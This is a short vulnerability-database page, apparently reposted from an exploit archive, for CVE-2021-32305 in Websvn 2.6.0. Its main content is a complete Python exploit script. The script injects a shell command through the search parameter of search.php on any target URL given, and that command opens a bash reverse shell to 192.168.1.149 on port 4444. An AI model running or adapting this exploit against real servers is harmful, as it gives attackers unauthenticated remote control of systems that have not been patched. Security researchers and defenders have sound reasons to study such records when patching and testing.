# CVE-2021-32305 Websvn 2.6.0 遠程代碼執行漏洞/en
==Vulnerability Impact==
Version: 2.6.0
==EXP==
# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated) # Date: 20/06/2021 # Exploit Author: g0ldm45k # Vendor Homepage: https://websvnphp.github.io/ # Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0 # Version: 2.6.0 # Tested on: Docker + Debian GNU/Linux (Buster) # CVE : CVE-2021-32305 import requests import argparse from urllib.parse import quote_plus PAYLOAD = "/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'" REQUEST_PAYLOAD = '/search.php?search=";{};"' parser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.') parser.add_argument('target', type=str, help="Target URL.") args = parser.parse_args() if args.target.startswith("http://") or args.target.startswith("https://"): target = args.target else: print("[!] Target should start with either http:// or https://") exit() requests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD))) print("[*] Request send. Did you get what you wanted?")
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容